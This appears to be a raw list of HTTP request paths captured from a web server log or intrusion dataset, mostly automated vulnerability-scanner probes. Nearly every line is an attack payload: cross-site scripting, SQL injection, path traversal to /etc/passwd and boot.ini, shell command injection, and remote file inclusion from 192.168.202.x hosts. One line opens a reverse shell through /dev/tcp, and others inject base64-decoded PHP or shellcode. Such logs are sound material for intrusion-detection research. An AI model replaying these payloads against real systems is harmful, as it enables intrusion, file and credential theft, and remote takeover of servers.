/t3af3tdz.do?<img src="javascript:alert(cross_site_scripting.nasl);">
/yef5f3d5.jsp?<meta http-equiv=set-cookie content="testcrcv=6167">
/main.php?frm_daynight=day&frm_passwd=&frm_referer=q72116194&frm_user=&scr_height=&scr_width=
/scripts/rot13sj.cgi?/etc/passwd
/examples/jsp/jsp2/jspx/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>
/main.php?stuff=";rm q85142671 #
/ywaxntrx.jspa?<script>cross_site_scripting.nasl</script>
/help.php?q="ver\xa0>q74458178&rem\xa0
/<meta http-equiv=set-cookie content="testggad=2000">
/eg2u8pbv.exe?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/k0pxpjgnimox.php
/phpmyadmin/way-board/way-board.cgi?db=/etc/passwd\x00
/cacti/gadgets/blog/blogmodel.php?path=/etc/passwd\x00
/en-us/n9xlumt5.html?<script>cross_site_scripting.nasl</script>
/manager/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 --
/phpmyadminsearch_results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/edit.jsp?page=user&editor=../../../install
/bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
/examples/jsp/sessions/supporter/tupdate.php?groupid=change&sg='
/bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/moclyxlwqyfjnp?
/scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/zz5thkvtmlgl?
/manager/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl
/grey's anatomy 3x09 repack hdtv/
/en-us/i686v90l.do?<meta http-equiv=set-cookie content="testfutf=1550">
/phpmyadmin/scripts/setup.php
/<script>document.cookie="testylfu=1313;"</script>
/7dbjwpw6.idc?<script>cross_site_scripting.nasl</script>
/addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/swgnhpydbq0t?
/esmozg5d.dll?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/property.exe
/prescription-xanax/
/if69ddo1.php?<script>document.cookie="testiabz=5220;"</script>
/scripts/troops.cgi
/javascript/win32.exe
/javascript/compliance.exe
/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,403538393,1441170175,1,1,1,1,1--&blogid=1
/phpmyadmin/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>
/examples/jsp/sessions/index.php?template=../../../loudblog/custom/config.php\x00
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../vtigerservice.php\x00
/main.php?stuff="&del\x0cq27346825&rem\x0c
/9o6g5vkn.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/'stoked' gets to the heart of extreme athletics/
/0u75ldxq.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/jsp2/jspx/config.php?path[docroot]=/etc/passwd\x00
/fmnveedu.idc?<meta http-equiv=set-cookie content="testgfbr=7014">
/help.php?q="&ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/javascript/pii.exe
/javascript/ubb.exe
/j4drbkil.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/jsp2/jspx/index.php?show=/etc/passwd
/1qwv2p5p.x?<script>document.cookie="testvqcy=252;"</script>
/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/ipb5ri?
/main.php?stuff="&rm q23549573 #
/script pack/
/rpxyx07v.dll?<script>document.cookie="testbnli=1975;"</script>
/pohentermine-prescription/
/eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
/ddoworrl.do?<script>document.cookie="testvlau=8517;"</script>
/megabook/admin.cgi?login=<script>alert('vulnerable')</script>
/initscripts/
/gazette-subscription/
/htbin/sensepost.exe?/c+dir
/bmeun223.idc?<meta http-equiv=set-cookie content="testhhwu=7044">
/examples/jsp/jsp2/jspx/showcat.php?cat=1'
/b5xdqgz2.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/cal/index.php?entry='
/javascript/contents.exe
/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/moclyxlwqyfjnp?
/javascript/decl.exe
/recordings/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331918989')</script>
/ttxssh2_210/
/projects/1/repository/annotate?rev=`0<&208-;exec 208<>/dev/tcp/192.168.202.118/26475;sh <&208 >&208 2>&208`
/en-us/7o5qp766.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/main.php?logout=ver\x0c>q59849218&rem\x0c
/scripts/secure.php?cfgprogdir=/etc/passwd\x00
/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908835',null,null,null,null --
/cgi.cgi/fileseek.cgi?foot=;cat /etc/passwd&head=
/path_script/createurl.php?formurl=http://192.168.202.96:8080/swgnhpydbq0t?
/index.php?op=default&date=200607' union select 1,1849014202,1,1,1,1,1,1,1,1--&blogid=1
/xnoscript/
/cacti/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00
/examples/servlets/servlet/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd
/javascript/tuscany.exe
/main.php?stuff=ver,>q65716768&rem,
/zv8tv7h8.asp?<meta http-equiv=set-cookie content="testcqwz=9752">
/main.php?stuff="ping,-w,7000,-n,1,4.3.2.1|rem,
/help.php?q="\x0duname >q75726259 #
/v3axg1p8.idc?<meta http-equiv=set-cookie content="testxagh=6987">
/top.php?stuff="ping\x0c-w\x0c10000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/main.php?logout="del\x0cq37726783&rem\x0c
/texis.exe/?-dump
/launch.jsp?nfuse_application=<script>alert('vulnerable')</script>
/phpmyadmin/index.php/1'
/examples/jsp/jsp2/el/index.php?configfile=../../../../../../../../../etc/passwd
/javascript/.htaccess.sfish/''''""""
/en-us/9kr0ih0v.dll?<script>document.cookie="testzgnm=1183;"</script>
/cgi-home/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|'
/scripts/axdgpyi2bn6f.php3
/fcgi-bin/gwweb.exe?help=bad-request
/top.php?stuff="&del\xa0q12371867&rem\xa0
/examples/jsp/checkbox/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wfppkgt4]));die;/*
/nyvbv05h.html?<meta http-equiv=set-cookie content="testftxz=5980">
/cgi-bin/server.pt?open=space&name=";}</script><script>alert('plumtree_name_xss.nasl')</script>
/chat/register.php?register=yes&username=overg&email=<script>alert (\"vulnerable\")</script>&email1=<script>alert (\"vulnerable\")</script>
/scripts/image.php?src=system/config/localconfig.php
/archive.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??
/..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1../winnt/system32/cmd.exe?/c+dir+c:\+/og
/main.php?frm_daynight=q51426141&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=
/bzuf9ozq.mscgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/boilerplate.asp?nfuse_template=../../boot.ini&nfuse_currentfolder=/sslx0020directories|-|0|404_object_not_found
/<meta http-equiv=set-cookie content="testgfbr=7014">
/index.php?err=3&email=\"><script>alert(document.cookie)</script>
/examples/jsp/num/admin/configset.php?settings_dir=/etc/passwd\x00
/cgi-bin/main.cgi?board=free_board&command=down_load&filename=../../../../../../../../../../etc/passwd
/help.php?q="sleep\x097\x09#
/ywaxntrx.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/jsp2/el/home/search.asp?nchannel='1
/moore's_law/
/cgi-perl/texis.exe/junk
/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331909370,1,1,1,1,1,1,1--&blogid=1
/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00
/zqqemp6j.htm?<script>cross_site_scripting.nasl</script>
/examples/jsp/num/remindpasswd
/examples/jsp/colors/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h
/main.php?stuff="\x0adel\x09q48139983\x09#
/cgi-bin/fileseek2.cgi?head=;cat /etc/passwd|&foot=
/examples/jsp/jsp2/jspx/index.php?string='
/javascript/info.exe
/javascript/.passwd.pfx
/scripts/index.php?include_files[]=&include_files[query_string]=/etc/passwd
/tukodz3j.cgi?<script>cross_site_scripting.nasl</script>
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "vj\0001j\0002\0211\0341j\0001jfx\0133\0315\0200\0222" >> /tmp/ldlchhikup0;echo|awstats247374.txt
/ows-bin/r.cgi?file=../../../../../../../../../../etc/passwd
<script>document.cookie="testtbjy=7334;"</script>
/jnt3f86c.kspx?<script>document.cookie="testcmax=9270;"</script>
/search.aspx?keywords=<script>alert("413385588094")</script>
/en-us/jnv890lt.nsf?<script>cross_site_scripting.nasl</script>
/main.php?stuff=;sleep 9 #
/help.php?q='|sleep 8 #
/examples/jsp/colors/cgiip.exe/wservice=wsbroker1/webutil/ping.p
/cacti/htmlscript?../../../../../../../../../etc/passwd
/help.php?q="&sleep\x099\x09#
/cgi-bin/starnet/addons/slideshow_full.php?album_name='1731917543
/javascript/_source.exe
/m4kkjf8l.aspx?<script>document.cookie="testyglc=8988;"</script>
/zln2hm2z.aspx?<script>document.cookie="testblcp=8120;"</script>
/help.php?q="&del q44114596 #
/javascript/view.exe
/cgi-bin/msmmask.exe?mask=/junk334
/recordings/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search
/manager/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html
/top.php?stuff=ver\x09>q92179245&rem\x09
/jnt3f86c.php3?<meta http-equiv=set-cookie content="testcmax=9270">
/scripts/printenv
/javascript/www2.exe
/top.php?stuff="\x0drm\x09q52865653\x09#
/javascript/.passwd.bin
/main.php?stuff="|ping,-w,8000,-n,1,1.2.3.4|rem,
/top.php?stuff="\x0auname\x09>q52122221\x09#
/item.fts?href="><script>alert("ftgate_44002.nasl")</script>;
/cgis/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/en-us/account/index.php?templates_dir=/etc/passwd\x00
/0rufe52p.idc?<script>cross_site_scripting.nasl</script>
/cgi-home/fileseek2.cgi?foot=&head=;cat /etc/passwd|
/en-us/n9xlumt5.dll?<script>cross_site_scripting.nasl</script>
/cgi-bin/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog
/v3axg1p8.nsf?<meta http-equiv=set-cookie content="testxagh=6987">
/scripts/tomcat_proxy_directory_traversal.nasl1332009307
/<meta http-equiv=set-cookie content="testmjct=1867">
/examples/jsp/error/wa.exe?debug-show-version
/miz4r5hz.nsf?<meta http-equiv=set-cookie content="testviqu=1270">
/fo564rei.php3?<script>cross_site_scripting.nasl</script>
/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331923203,1242183873 --
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+a+1f4+>>ctdn
/javascript/logo.exe
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/frznctvhi0i5?\x00
/path_script/createurl.php?formurl=http://192.168.202.118:8080/tzhfyzkbomspvm?
/cgi-bin/search.jsp?q=%"<script>alert(1332010405)</script>
/examples/jsp/colors/search.php?submit=true&search=');
/help.php?q="rm\x0cq65994111&rem\x0c
/examples/jsp/sessions/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org
/help.php?q="\x0dsleep\x097\x09#
/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/zz5thkvtmlgl?
/en-us/account/sendcard.php?view=1&id='sendcard_sql.nasl
/de3v2dd9.html?<script>cross_site_scripting.nasl</script>
/h5i6crm3.cgi?<script>document.cookie="testlihk=7070;"</script>
/cacti/index.php?mod_id=2&kb_ask=</textarea><script>alert("cerberus_support_center_mult_flaws.nasl")</script>
/javascript/.htpasswd.sfish/9-8
/o35zot2r.php?<script>cross_site_scripting.nasl</script>
/javascript/jboss.exe
<meta http-equiv=set-cookie content="testsqmm=5713">
/scripts/webnews.pl
/javascript/dmsdump.exe
/scripts/tsweb/
/scripts/search.jsp?q=%"<script>alert(1332009303)</script>
/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_6drqhnv_]));die;/*
/b4vng02k.nsf?<script>document.cookie="testtrlh=3672;"</script>
/javascript/survey.exe
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;/tmp/xjmtpvepcz;"
/j4oqyvga.php?<script>cross_site_scripting.nasl</script>
/zroo33l4.dll?<meta http-equiv=set-cookie content="testiklc=904">
/main.php?logout="\x0drm q33212666 #
/top.php?stuff="ver >q85581856&rem
/main.php?logout=;sleep 7 #
/main.inc.php?pathtoscript=@rfiurl
/main.php?stuff="del,q26668686&rem,
/manager/texis.exe/nessus
/n1afe1y6.kspx?<script>cross_site_scripting.nasl</script>
/w4996nr0.nsf?<meta http-equiv=set-cookie content="testttvs=7163">
/examples/jsp/jsp2/jspx/shopper.cgi?newpage=../../../../../../etc/passwd
/subscription-management/
/javascript/net.exe
/main.php?logout="&ping\x0b-w\x0b11000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b
/javascript/dba.exe
/82q7ywa8.cfm?<meta http-equiv=set-cookie content="testpwew=1315">
/u8yiqilu.kspx?<script>document.cookie="testswjp=6010;"</script>
/en-us/account/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print "content-type: text/plain\x0d\x0a\x0d\x0a";system(id)&action=logout
/javascript/jbossws.exe
/help.php?q='rm q41634876 #
/top.php?stuff="&sleep 8 #
/javascript/trailers.exe
/examples/jsp/jsp2/el/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
/tothemaxss/
/examples/jsp/checkbox/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/drhcprxk.exe|dir
/examples/jsp/num/commerce.cgi?page=../../../../../etc/passwd\x00index.html
/scripts/samples/search/qfullhit.htw
/index.php?p=..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\x00
/john battelle's searchblog/
/en-us/hipkz026.cfm?<meta http-equiv=set-cookie content="testyrbs=2855">
/w4996nr0.dll?<meta http-equiv=set-cookie content="testttvs=7163">
/en-us/hipkz026.aspx?<meta http-equiv=set-cookie content="testyrbs=2855">
/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
/en-us/<script>cross_site_scripting.nasl</script>.php3
/hostadmin/?page='
/javascript/2009.exe
/tocjscript1/
/recordings/forumdisplay.php?fid=21"><script>x</script>
/d7ktpmcq.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/1331904972-ror_session_fixation.nasl
/u8yiqilu.do?<script>document.cookie="testswjp=6010;"</script>
/recordings/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00
/en-us/hipkz026.mscgi?<script>document.cookie="testyrbs=2855;"</script>
/top.php?stuff="ver&rem\xa0
/main.php?stuff="|ping -w 9000 -n 1 4.3.2.1|rem
/top.php?stuff='\x0adel\x09q23871271\x09#
/main.php?stuff=";sleep\x098\x09#
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;chmod+555+/tmp/ukirnkmpbn;"
/en-us/<script>cross_site_scripting.nasl</script>.jspa
/cgi-bin/index.php?op=default&date=200607' union select 1,1759684664,1,1,1,1,1,1,1,1--&blogid=1
/hjdzm96v.htm?<meta http-equiv=set-cookie content="testbyqe=7474">
/examples/jsp/colors/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
/en-us/account/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/abouttrialsubscription/
/path_script/createurl.php?formurl=http://cirt.net/rfiinc.txt?
/rv98iwjp.jsp?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/num/faq.php?action=&type=view&s=&id=-1' union select 0,1013365063,0,0,0,0,0--
/backupscript/
/fpnpp5zg.cgi?<meta http-equiv=set-cookie content="testyias=101">
/m5103snj.exe?<img src="javascript:alert(cross_site_scripting.nasl);">
/?<meta http-equiv=set-cookie content="testnofv=4170">
/javascript/get.exe
/en-us/manager/launcher/apps/local?msgid=8839950.734222518743&ns=launcher&redirecting=true
/cacti/bb_func_txt.php?pathtofiles=/etc/passwd\x00
/sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
/options.php?optpage=<script>alert('vulnerable!')</script>
/mpgscript/
/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331909424,4--&blog=1
/examples/jsp/checkbox/kb.cgi?view='&lang=en
/examples/jsp/jsp2/jspx/admin/addentry.php?phpbb_root_path=/etc/passwd\x00
/tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(tomcat_sample_hello_xss.nasl)</script>
/admin/index.php?path_to_script=http://192.168.202.96:8080/4dckqcc0acprbz??&cmd=ls
/_vti_bin/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og
/rpc/..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1../winnt/system32/cmd.exe?/c+dir+c:\+/og
/javascript/toggle.exe
/javascript/f.exe
/phpmyadmin/documentation.html?phpmyadmin=print(md5(acunetix_wvs_security_test));die();/*
/recordings/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1
/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file¤tfolder=/flkzzubocd.jsp\x00
/nyvbv05h.pl?<script>document.cookie="testftxz=5980;"</script>
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "vj\0001j\0002\0211\0341j\0001jfx\0133\0315\0200\0222" >> /tmp/gjvtlghpjb0;echo|awstats360621.txt
/vac1l5vm.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/manager/sources/functions.php?root_path=/etc/passwd\x00
/"france 24"/
/recordings/smpwservicescgi.exe
/cgi-bin/snpfiltered.pl?t=c&u=<script>foo</script>
/examples/jsp/num/index.php?id=urjhxcl19w'
/prescript/
/javascript/cars.exe
/manager/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>
/javascript/document.war
/scripts/sc877q2pzqne.shtml
/phpmyadmin/demos/demo.browse.php?filename=/etc/passwd
/vhzmaia2.php?<script>document.cookie="testkogj=3979;"</script>
/r3le3om5.pl?<script>cross_site_scripting.nasl</script>
/hipkz026.exe?<script>document.cookie="testyrbs=2855;"</script>
/cgi.cgi/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/.htpasswd
/scripts/basilix.php
/jsp-examples/cal/cal2.jsp?time=8am<script>alert("tomcat_sample_cal2_xss.nasl")</script>
/j734qobz.idc?<script>cross_site_scripting.nasl</script>
/bin/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf
/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331905161
/9kr0ih0v.exe?<script>document.cookie="testzgnm=1183;"</script>
/1r8cfrlf.php?<meta http-equiv=set-cookie content="testydan=5106">
/main.php?stuff=ping;-w;11000;-n;1;4.3.2.1|rem;
/rubberstampsscriptalphabet/
/addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/llumt7msyau5y?
/main.php?logout="rm\x0bq12574322&rem\x0b
/i7prbs22.html?<meta http-equiv=set-cookie content="testjnre=7328">
/scripts/wihphoto/start.php
/weq93ppb.pl?<img src="javascript:alert(cross_site_scripting.nasl);">
/zln2hm2z.fts?<meta http-equiv=set-cookie content="testblcp=8120">
/ghswfouu.jsp?<script>document.cookie="testsqmm=5713;"</script>
/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/y8pmygrp.x?<img src="javascript:alert(cross_site_scripting.nasl);">
/top.php?stuff='uname >q24953383 #
/manager/index.php?show=../../../../../../../../../../../etc/passwd\x00
/cgi-bin/prn/../../../../../../../../../winnt/system32/ipconfig.exe
/help.php?q=;rm\x09q81281166\x09#
/examples/jsp/checkbox/index.php?cat_select=<script>foo</script>
/servlet/webacc?user.lang=<script>foo</script>
/help.php?q="ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c
/xfkun1ku.fts?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/post.exe
/en-us/oie504mr.cfm?<script>document.cookie="testtpby=7052;"</script>
/hrttz9fj.htm?<script>document.cookie="testtbjy=7334;"</script>
/aj3pf49c.jspa?<script>document.cookie="testnofv=4170;"</script>
/javascript/htpasswd.c
/copying/</p><body><script src=http://www.example.com/test?rnd=q64711831></script><p>
/javascript/sl.exe
/examples/jsp/jsp2/jspx/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id
/javascript/.web.exe
/zln2hm2z.htm?<meta http-equiv=set-cookie content="testblcp=8120">
/ju0u7kfo.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
/bmeun223.pl?<script>document.cookie="testhhwu=7044;"</script>
/ht8pn8uq.dll?<img src="javascript:alert(cross_site_scripting.nasl);">
/help.php?q='\x0adel\x09q79344163\x09#
/help.php?q="ping;-w;10000;-n;1;1.2.3.4|rem;
/.../.../.../.../.../.../.../.../.../windows/win.ini
/examples/servlets/servlet/starnet/addons/slideshow_full.php?album_name='1978429620
/vac1l5vm.php3?<script>cross_site_scripting.nasl</script>
/javascript/presentations.exe
/help.php?q="rm q92991511 #
/xsqln7eb.php3?<meta http-equiv=set-cookie content="testpcbb=9254">
/script/ident/loginliste.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?
/33y9gcqq.x?<script>document.cookie="testnvxc=4301;"</script>
/en-us/account/index.php?op=default&date=200607' union select 1,674790948,1,1,1,1,1,1,1,1--&blogid=1
/javascript/monitor.exe
/scripts/h3d1n9eaqxv3.html
/examples/jsp/jsp2/jspx/kernel/loadkernel.php?installpath=/etc/passwd\x00
/xssxmltest/
/help.php?q="&uname #
/dslpwt15.php3?<meta http-equiv=set-cookie content="testtkio=5454">
/examples/servlets/servlet/al_initialize.php?alpath=/etc/passwd\x00
/ao22ww7y.php3?<script>document.cookie="testqppc=8767;"</script>
/cacti/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>
/7o5qp766.cfm?<script>cross_site_scripting.nasl</script>
/main.php?logout="ver\xa0>q32937989&rem\xa0
/scripts/icat
/6wb70v0b.html?<img src="javascript:alert(cross_site_scripting.nasl);">
/5qnlm5z2.jspa?<script>document.cookie="testsixi=8451;"</script>
/javascript/hipaa.exe
/manager/faq.php?action=&type=view&s=&id=-1' union select 0,348320449,0,0,0,0,0--
/if69ddo1.mscgi?<meta http-equiv=set-cookie content="testiabz=5220">
/scripts/faxsurvey?cat /etc/passwd
/javascript/filez.exe
/script_path/config.inc.php?_path=http://192.168.202.96:8080/4dckqcc0acprbz??
/en-us/account/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;
/scripts/file.php?path=/etc/passwd\x00
/6wb70v0b.mscgi?<script>cross_site_scripting.nasl</script>
/iktok2bw.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
/en-us/jnv890lt.cfc?<script>cross_site_scripting.nasl</script>
/cgi-bin/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f
/r3le3om5.cfm?<script>cross_site_scripting.nasl</script>
/main.php?logout=';rm\x09q16263765\x09#
/recordings/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00
/main.php?stuff="\x0arm\x09q48139983\x09#
/nigdyniewieszcomo\xbfeszzyska\xe6atakwieledostraceniajest:(/
/scripts/bveygnpo6hkw.pl
/j4drbkil.fts?<script>cross_site_scripting.nasl</script>
/javascript/gump.exe
/<script>cross_site_scripting.nasl</script>.nsf
/main.php?logout=;del\x09q38215685\x09#
/<script>document.cookie="testxagh=6987;"</script>
/en-us/fo564rei.x?<script>cross_site_scripting.nasl</script>
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+8b+ec+50+60+6a+04+5a+50+8b+dc+e8+41+00+00+00+6a+00+68+6c+6c+6f+63+68+75+61++>>ctdn
/<meta http-equiv=set-cookie content="testwldz=3506">
/javascript/definition.exe
/nyvbv05h.x?<script>document.cookie="testftxz=5980;"</script>
/en-us/account/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00
/help.php?q='\x0adel q19373947 #
/javascript/rhtml.exe
/t7tm4m0b.dll?<img src="javascript:alert(cross_site_scripting.nasl);">
/cacti/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331909287')</script>
/roads/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd\x00
/javascript/document.gz
/addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/txenjrxf3?
/javascript/assets.exe
/fo564rei.mscgi?<script>cross_site_scripting.nasl</script>
/cgi-bin/index.php?id='union/**/select/**/0,0,763560836,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/zmvq66jy.nsf?<script>cross_site_scripting.nasl</script>
/javascript/space.exe
/edzaia0i.dll?<script>cross_site_scripting.nasl</script>
/examples/jsp/num/index.php?site=../../../../../../../../etc/passwd\x00
/jw64yq8u.cfm?<meta http-equiv=set-cookie content="testylfu=1313">
/cgi-bin/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||
/examples/jsp/error/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/iktok2bw.pl?<script>cross_site_scripting.nasl</script>
/eei78ore.x?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin/documentation.html?phpmyadmin=&cat /etc/passwd&
/....\....\....\....\....\....\....\....\....\windows\win.ini
/mpcgi/sensepost.exe?/c+dir
/cgi-bin/visitor.exe
/scripts/rx9ysf2iwv4j.pl
/7u1pb2xi.htm?<script>document.cookie="testlwwz=718;"</script>
/scripts/blog/mt-check.cgi
/scripts/zq9frlz6fcfp.php3
/cgi-bin/index.php?act=arcade&do=stats&gameid=1'
/cgi-bin/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd
/phpmyadmin/includes/converter.inc.php?include_path=/etc/passwd\x00
/scripts/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
/scripts/2sfdqydfaknx.pl
/help.php?q="&rm;q83399542&rem;
/scripts/bpk_bsfe_4vq.sh
/8t9v8k7x.nsf?<script>document.cookie="testhvje=9403;"</script>
//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../
/t7tm4m0b.fts?<script>cross_site_scripting.nasl</script>
/weq93ppb.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00
/javascript/devel.exe
/login/sm_login_screen.php?uid=\"><script>alert('vulnerable')</script>
/cgi-sys/c32web.exe/changeadminpassword
/cgis/ion-p?page=../../../../../etc/passwd
/en-us/i686v90l.cgi?<script>document.cookie="testfutf=1550;"</script>
/javascript/maps.exe
/recordingsmultihtml.pl?multi=/etc/passwd\x00html
/index.php?config["sipssys"]=http://192.168.202.118:8080/ghl9il?
/g8nu2yy7.html?<script>cross_site_scripting.nasl</script>
/jnt3f86c.php?<script>document.cookie="testcmax=9270;"</script>
/examples/jsp/sessions/search.cgi?..\..\..\..\..\..\winnt\win.ini
/en-us/account/review.php?id=1&cat=&subcat="><script>alert('phpmydirectory_multiple_xss.nasl');</script>
/a.jsp/<script>alert('vulnerable')</script>
/script//ident/index.php?path_inc=http://192.168.202.118:8080/ghl9il?
/33y9gcqq.idc?<meta http-equiv=set-cookie content="testnvxc=4301">
/main.php?stuff="\x0auname >q72652917 #
/comments.php?scriptpath=http://192.168.202.118:8080/moclyxlwqyfjnp??
/javascript/.passwd.orig
/v3axg1p8.dll?<meta http-equiv=set-cookie content="testxagh=6987">
/subscriptions.orig
/1r8cfrlf.asp?<meta http-equiv=set-cookie content="testydan=5106">
/5o9zq43e.jspa?<script>cross_site_scripting.nasl</script>
/scripts/mail.php?id='/**/union/**/select/**/1,2,1331909424,4--&blog=1
/examples/jsp/num/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
/examples/jsp/num/backend/classes.php?include_path=../lib/jinzora.js\x00
/h4bi26jd.x?<meta http-equiv=set-cookie content="testhrzx=1150">
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00
/pbserver/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og
/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/?<meta http-equiv=set-cookie content="testiabz=5220">
/fc9t54l7.cgi?<meta http-equiv=set-cookie content="testggad=2000">
/3hlysl2x.fts?<script>document.cookie="testgjbe=8505;"</script>
/qczkquis.pl?<script>document.cookie="testkwlg=5591;"</script>
